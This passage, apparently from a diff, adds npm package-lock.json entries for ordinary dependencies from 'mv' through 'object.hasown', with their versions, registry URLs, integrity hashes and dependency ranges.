"dependencies": { + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "2 || 3", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + } + }, + "node_modules/mv/node_modules/rimraf": { + "version": "2.4.5", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.4.5.tgz", + "integrity": "sha1-7nEM5dk6j9uFb7Xqj/Di11k0sto=", + "optional": true, + "dependencies": { + "glob": "^6.0.1" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/namespace-emitter": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/namespace-emitter/-/namespace-emitter-2.0.1.tgz", + "integrity": "sha512-N/sMKHniSDJBjfrkbS/tpkPj4RAbvW3mr8UAzvlMHyun93XEm83IAvhWtJVHo+RHn/oO8Job5YN4b+wRjSVp5g==", + "dev": true + }, + "node_modules/nan": { + "version": "2.22.2", + "resolved": "https://registry.npmjs.org/nan/-/nan-2.22.2.tgz", + "integrity": "sha512-DANghxFkS1plDdRsX0X9pm0Z6SJNN6gBdtXfanwoZ8hooC5gosGFSBGRYHUVPz1asKA/kMRqDRdHrluZ61SpBQ==", + "license": "MIT" + }, + "node_modules/nanoclone": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/nanoclone/-/nanoclone-0.2.1.tgz", + "integrity": "sha512-wynEP02LmIbLpcYw8uBKpcfF6dmg2vcpKqxeH5UcoKEYdExslsdUA4ugFauuaeYdTB76ez6gJW8XAZ6CgkXYxA==", + "dev": true + }, + "node_modules/nanomatch": { + "version": "1.2.13", + "resolved": "https://registry.npmjs.org/nanomatch/-/nanomatch-1.2.13.tgz", + "integrity": "sha512-fpoe2T0RbHwBTBUOftAfBPaDEi06ufaUai0mE6Yn1kacc3SnTErfb/h+X94VXzI64rKFHYImXSvdwGGCmwOqCA==", + "dev": true, + "dependencies": { + "arr-diff": "^4.0.0", + "array-unique": "^0.3.2", + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "fragment-cache": "^0.2.1", + "is-windows": "^1.0.2", + "kind-of": "^6.0.2", + "object.pick": "^1.3.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/native-promise-only": { + "version": "0.8.1", + "resolved": "https://registry.npmjs.org/native-promise-only/-/native-promise-only-0.8.1.tgz", + "integrity": "sha1-IKMYwwy0X3H+et+/eyHJnBRy7xE=" + }, + "node_modules/native-request": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/native-request/-/native-request-1.1.0.tgz", + "integrity": "sha512-uZ5rQaeRn15XmpgE0xoPL8YWqcX90VtCFglYwAgkvKM5e8fog+vePLAhHxuuv/gRkrQxIeh5U3q9sMNUrENqWw==", + "dev": true, + "optional": true + }, + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=" + }, + "node_modules/ncp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ncp/-/ncp-2.0.0.tgz", + "integrity": "sha1-GVoh1sRuNh0vsSgbo4uR6d9727M=", + "optional": true, + "bin": { + "ncp": "bin/ncp" + } + }, + "node_modules/negotiator": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/neo-async": { + "version": "2.6.2", + "resolved": "https://registry.npmjs.org/neo-async/-/neo-async-2.6.2.tgz", + "integrity": "sha512-Yd3UES5mWCSqR+qNT93S3UoYUkqAZ9lLg8a7g9rimsWmYGK8cVToA4/sF3RrshdyV3sAGMXVUmpMYOw+dLpOuw==", + "dev": true + }, + "node_modules/next-tick": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/next-tick/-/next-tick-1.1.0.tgz", + "integrity": "sha512-CXdUiJembsNjuToQvxayPZF9Vqht7hewsvy2sOWafLvi2awflj9mOC6bHIg50orX8IJvWKY9wYQ/zB2kogPslQ==" + }, + "node_modules/nise": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/nise/-/nise-4.1.0.tgz", + "integrity": "sha512-eQMEmGN/8arp0xsvGoQ+B1qvSkR73B1nWSCh7nOt5neMCtwcQVYQGdzQMhcNscktTsWB54xnlSQFzOAPJD8nXA==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0", + "@sinonjs/fake-timers": "^6.0.0", + "@sinonjs/text-encoding": "^0.7.1", + "just-extend": "^4.0.2", + "path-to-regexp": "^1.7.0" + } + }, + "node_modules/nise/node_modules/isarray": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-0.0.1.tgz", + "integrity": "sha1-ihis/Kmo9Bd+Cav8YDiTmwXR7t8=", + "dev": true + }, + "node_modules/nise/node_modules/path-to-regexp": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-1.9.0.tgz", + "integrity": "sha512-xIp7/apCFJuUHdDLWe8O1HIkb0kQrOMb/0u6FXQjemHn/ii5LrIzU6bdECnsiTF/GjZkMEKg1xdiZwNqDYlZ6g==", + "dev": true, + "dependencies": { + "isarray": "0.0.1" + } + }, + "node_modules/no-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/no-case/-/no-case-3.0.4.tgz", + "integrity": "sha512-fgAN3jGAh+RoxUGZHTSOLJIqUc2wmoBwGR4tbpNAKmmovFoWq0OdRkb0VkldReO2a2iBT/OEulG9XSUc10r3zg==", + "dev": true, + "dependencies": { + "lower-case": "^2.0.2", + "tslib": "^2.0.3" + } + }, + "node_modules/nocache": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/nocache/-/nocache-2.1.0.tgz", + "integrity": "sha512-0L9FvHG3nfnnmaEQPjT9xhfN4ISk0A8/2j4M37Np4mcDesJjHgEUfgPhdCyZuFI954tjokaIj/A3NdpFNdEh4Q==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/nock": { + "version": "13.5.4", + "resolved": "https://registry.npmjs.org/nock/-/nock-13.5.4.tgz", + "integrity": "sha512-yAyTfdeNJGGBFxWdzSKCBYxs5FxLbCg5X5Q4ets974hcQzG1+qCxvIyOo4j2Ry6MUlhWVMX4OoYDefAIIwupjw==", + "dev": true, + "dependencies": { + "debug": "^4.1.0", + "json-stringify-safe": "^5.0.1", + "propagate": "^2.0.0" + }, + "engines": { + "node": ">= 10.13" + } + }, + "node_modules/node-abort-controller": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/node-abort-controller/-/node-abort-controller-3.1.1.tgz", + "integrity": "sha512-AGK2yQKIjRuqnc6VkX2Xj5d+QW8xZ87pa1UK6yA6ouUyuxfHuMP6umE5QK7UmTeOAymo+Zx1Fxiuw9rVx8taHQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-addon-api": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-3.2.1.tgz", + "integrity": "sha512-mmcei9JghVNDYydghQmeDX8KoAm0FAiYyIcUt/N4nhyAipB17pllZQDOJD2fotxABnt4Mdz+dKTO7eftLg4d0A==" + }, + "node_modules/node-dir": { + "version": "0.1.17", + "resolved": "https://registry.npmjs.org/node-dir/-/node-dir-0.1.17.tgz", + "integrity": "sha512-tmPX422rYgofd4epzrNoOXiE8XFZYOcCq1vD7MAXCDO+O+zndlA2ztdKKMa+EeuBG5tHETpr4ml4RGgpqDCCAg==", + "dev": true, + "dependencies": { + "minimatch": "^3.0.2" + }, + "engines": { + "node": ">= 0.10.5" + } + }, + "node_modules/node-domexception": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/node-domexception/-/node-domexception-1.0.0.tgz", + "integrity": "sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/jimmywarting" + }, + { + "type": "github", + "url": "https://paypal.me/jimmywarting" + } + ], + "engines": { + "node": ">=10.5.0" + } + }, + "node_modules/node-ensure": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/node-ensure/-/node-ensure-0.0.0.tgz", + "integrity": "sha512-DRI60hzo2oKN1ma0ckc6nQWlHU69RH6xN0sjQTjMpChPfTYvKZdcQFfdYK2RWbJcKyUizSIy/l8OTGxMAM1QDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/node-fetch-native": { + "version": "1.6.6", + "resolved": "https://registry.npmjs.org/node-fetch-native/-/node-fetch-native-1.6.6.tgz", + "integrity": "sha512-8Mc2HhqPdlIfedsuZoc3yioPuzp6b+L5jRCRY1QzuWZh2EGJVQrGppC6V6cF0bLdbW0+O2YpqCA25aF/1lvipQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/node-fetch/node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha1-gYT9NH2snNwYWZLzpmIuFLnZq2o=" + }, + "node_modules/node-fetch/node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha1-JFNCdeKnvGvnvIZhHMFq4KVlSHE=" + }, + "node_modules/node-fetch/node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha1-lmRU6HZUYuN2RNNib2dCzotwll0=", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "node_modules/node-forge": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/node-forge/-/node-forge-1.3.1.tgz", + "integrity": "sha512-dPEtOeMvF9VMcYV/1Wb8CPoVAXtp6MKMlcbAt4ddqmGqUJ6fQZFXkNZNkNlfevtNkGtaSoXf/vNNNSvgrdXwtA==", + "engines": { + "node": ">= 6.13.0" + } + }, + "node_modules/node-gyp-build-optional-packages": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/node-gyp-build-optional-packages/-/node-gyp-build-optional-packages-5.2.2.tgz", + "integrity": "sha512-s+w+rBWnpTMwSFbaE0UXsRlg7hU4FjekKU4eyAih5T8nJuNZT1nNsskXpxmeqSK9UzkBl6UgRlnKc8hz8IEqOw==", + "license": "MIT", + "optional": true, + "dependencies": { + "detect-libc": "^2.0.1" + }, + "bin": { + "node-gyp-build-optional-packages": "bin.js", + "node-gyp-build-optional-packages-optional": "optional.js", + "node-gyp-build-optional-packages-test": "build-test.js" + } + }, + "node_modules/node-gyp-build-optional-packages/node_modules/detect-libc": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.0.3.tgz", + "integrity": "sha512-bwy0MGW55bG41VqxxypOsdSdGqLwXPI/focwgTYCFMbdUiBAxLg9CFzG08sz2aqzknwiX7Hkl0bQENjg8iLByw==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/node-int64": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + }, + "node_modules/node-releases": { + "version": "2.0.18", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true + }, + "node_modules/nodemailer": { + "version": "6.9.9", + "resolved": "https://registry.npmjs.org/nodemailer/-/nodemailer-6.9.9.tgz", + "integrity": "sha512-dexTll8zqQoVJEZPwQAKzxxtFn0qTnjdQTchoU6Re9BUUGBJiOy3YMn/0ShTW6J5M0dfQ1NeDeRTTl4oIWgQMA==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/nodemailer-ses-transport": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/nodemailer-ses-transport/-/nodemailer-ses-transport-1.5.1.tgz", + "integrity": "sha1-3AWYwb9T6GUuYy6PMWks4CLX3qk=", + "dependencies": { + "aws-sdk": "^2.2.36" + } + }, + "node_modules/nodemon": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/nodemon/-/nodemon-3.0.1.tgz", + "integrity": "sha512-g9AZ7HmkhQkqXkRc20w+ZfQ73cHLbE8hnPbtaFbFtCumZsjyMhKk9LajQ07U5Ux28lvFjZ5X7HvWR1xzU8jHVw==", + "dev": true, + "dependencies": { + "chokidar": "^3.5.2", + "debug": "^3.2.7", + "ignore-by-default": "^1.0.1", + "minimatch": "^3.1.2", + "pstree.remy": "^1.1.8", + "semver": "^7.5.3", + "simple-update-notifier": "^2.0.0", + "supports-color": "^5.5.0", + "touch": "^3.1.0", + "undefsafe": "^2.0.5" + }, + "bin": { + "nodemon": "bin/nodemon.js" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/nodemon" + } + }, + "node_modules/nodemon/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/nodemon/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/nodemon/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/nodemon/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/nodemon/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/nodemon/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/nopt": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-5.0.0.tgz", + "integrity": "sha512-Tbj67rffqceeLpcRXrT7vKAN8CwfPeIBgM7E6iBkmKLV7bEMwpGgYLGv0jACUsECaa/vuxP0IjEont6umdMgtQ==", + "dependencies": { + "abbrev": "1" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/normalize-package-data": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", + "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", + "dev": true, + "dependencies": { + "hosted-git-info": "^2.1.4", + "resolve": "^1.10.0", + "semver": "2 || 3 || 4 || 5", + "validate-npm-package-license": "^3.0.1" + } + }, + "node_modules/normalize-package-data/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/normalize-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/normalize-range": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz", + "integrity": "sha1-LRDAa9/TEuqXd2laTShDlFa3WUI=", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/now-and-later": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/now-and-later/-/now-and-later-3.0.0.tgz", + "integrity": "sha512-pGO4pzSdaxhWTGkfSfHx3hVzJVslFPwBp2Myq9MYN/ChfJZF87ochMAXnvz6/58RJSf5ik2q9tXprBBrk2cpcg==", + "dev": true, + "dependencies": { + "once": "^1.4.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/npm-run-path": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", + "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, + "dependencies": { + "path-key": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/npmlog": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-5.0.1.tgz", + "integrity": "sha512-AqZtDUWOMKs1G/8lwylVjrdYgqA4d9nu8hc+0gzRxlDb1I10+FHBGMXs6aiQHFdCUUlqH99MUMuLfzWDNDtfxw==", + "dependencies": { + "are-we-there-yet": "^2.0.0", + "console-control-strings": "^1.1.0", + "gauge": "^3.0.0", + "set-blocking": "^2.0.0" + } + }, + "node_modules/nth-check": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/nth-check/-/nth-check-2.0.1.tgz", + "integrity": "sha512-it1vE95zF6dTT9lBsYbxvqh0Soy4SPowchj0UBGj/V6cTPnXXtQOPUbhZ6CmGzAD/rW22LQK6E96pcdJXk4A4w==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0" + }, + "funding": { + "url": "https://github.com/fb55/nth-check?sponsor=1" + } + }, + "node_modules/nvd3": { + "version": "1.8.6", + "resolved": "https://registry.npmjs.org/nvd3/-/nvd3-1.8.6.tgz", + "integrity": "sha1-LT66dL8zNjtRAevx0JPFmlOuc8Q=", + "dev": true, + "peerDependencies": { + "d3": "^3.4.4" + } + }, + "node_modules/nwsapi": { + "version": "2.2.7", + "resolved": "https://registry.npmjs.org/nwsapi/-/nwsapi-2.2.7.tgz", + "integrity": "sha512-ub5E4+FBPKwAZx0UwIQOjYWGHTEq5sPqHQNRN8Z9e4A7u3Tj1weLJsL59yH9vmvqEtBHaOmT6cYQKIZOxp35FQ==", + "dev": true + }, + "node_modules/nypm": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/nypm/-/nypm-0.5.4.tgz", + "integrity": "sha512-X0SNNrZiGU8/e/zAB7sCTtdxWTMSIO73q+xuKgglm2Yvzwlo8UoC5FNySQFCvl84uPaeADkqHUZUkWy4aH4xOA==", + "dev": true, + "license": "MIT", + "dependencies": { + "citty": "^0.1.6", + "consola": "^3.4.0", + "pathe": "^2.0.3", + "pkg-types": "^1.3.1", + "tinyexec": "^0.3.2", + "ufo": "^1.5.4" + }, + "bin": { + "nypm": "dist/cli.mjs" + }, + "engines": { + "node": "^14.16.0 || >=16.10.0" + } + }, + "node_modules/oauth": { + "version": "0.9.15", + "resolved": "https://registry.npmjs.org/oauth/-/oauth-0.9.15.tgz", + "integrity": "sha1-vR/vr2hslrdUda7VGWQS/2DPucE=" + }, + "node_modules/oauth-sign": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", + "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", + "engines": { + "node": "*" + } + }, + "node_modules/object-assign": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha1-IQmtx5ZYh8/AXLvUQsrIv7s2CGM=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/object-copy/-/object-copy-0.1.0.tgz", + "integrity": "sha512-79LYn6VAb63zgtmAteVOWo9Vdj71ZVBy3Pbse+VqxDpEP83XuujMrGqHIwAXJ5I/aM0zU7dIyIAhifVTPrNItQ==", + "dev": true, + "dependencies": { + "copy-descriptor": "^0.1.0", + "define-property": "^0.2.5", + "kind-of": "^3.0.3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-copy/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object-copy/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-hash": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", + "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/object-inspect": { + "version": "1.13.1", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.1.tgz", + "integrity": "sha512-5qoj1RUiKOMsCCNLV1CBiPYE10sziTsnmNxkAI/rZhiD63CF7IqdFGC/XzjWjpSgLf0LxXX3bDFIh0E18f6UhQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-is": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/object-is/-/object-is-1.1.5.tgz", + "integrity": "sha512-3cyDsyHgtmi7I7DfSSI2LDp6SK2lwvtbg0p0R1e0RvTqF5ceGx+K2dfSjm1bKDMVCFEDAQvy+o8c6a7VujOddw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-keys": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "integrity": "sha512-NuAESUOUMrlIXOfHKzD6bpPu3tYt3xvjNdRIQ+FeT0lNb4K8WR70CaDxhuNguS2XG+GjkyMwOzsN5ZktImfhLA==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object-visit": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/object-visit/-/object-visit-1.0.1.tgz", + "integrity": "sha512-GBaMwwAVK9qbQN3Scdo0OyvgPW7l3lnaVMj84uTOZlswkX0KpF6fyDBJhtTthf7pymztoN36/KEr1DyhF96zEA==", + "dev": true, + "dependencies": { + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object.assign": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.5.tgz", + "integrity": "sha512-byy+U7gp+FVwmyzKPYhW2h5l3crpmGsxl7X2s8y43IgxvG4g3QZ6CffDtsNQy1WsmZpQbO+ybo0AlW7TY6DcBQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "define-properties": "^1.2.1", + "has-symbols": "^1.0.3", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.entries": { + "version": "1.1.7", + "resolved": "https://registry.npmjs.org/object.entries/-/object.entries-1.1.7.tgz", + "integrity": "sha512-jCBs/0plmPsOnrKAfFQXRG2NFjlhZgjjcBLSmTnEhU8U6vVTsVe8ANeQJCHTl3gSsI4J+0emOoCgoKlmQPMgmA==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.fromentries": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/object.fromentries/-/object.fromentries-2.0.6.tgz", + "integrity": "sha512-VciD13dswC4j1Xt5394WR4MzmAQmlgN72phd/riNp9vtD7tp4QQWJ0R4wvclXcafgcYK8veHRed2W6XeGBvcfg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.getownpropertydescriptors": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/object.getownpropertydescriptors/-/object.getownpropertydescriptors-2.1.3.tgz", + "integrity": "sha512-VdDoCwvJI4QdC6ndjpqFmoL3/+HxffFBbcJzKi5hwLLqqx3mdbedRpfZDdK0SrOSauj8X4GzBvnDZl4vTN7dOw==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.1" + }, + "engines": { + "node": ">= 0.8" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.getprototypeof": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/object.getprototypeof/-/object.getprototypeof-1.0.5.tgz", + "integrity": "sha512-4G0QiXpoIppBUz5efmxTm/HTbVN2ioGjk/PbsaNvwISFX+saj8muGp6vNuzIdsosFxM4V/kpUVNvy/+9+DVBZQ==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "reflect.getprototypeof": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.hasown": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/object.hasown/-/object.hasown-1.1.2.tgz", + "integrity": "sha512-B5UIT3J1W+WuWIU55h0mjlwaqxiE5vYENJXIXZ4VFe05pNYrkKuK0U/6aFcb0pKywYJh7IhfoqUfKVmrJJHZHw==", + "dev": true, + "dependencies": { + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4" + }, + "funding": { + "url": 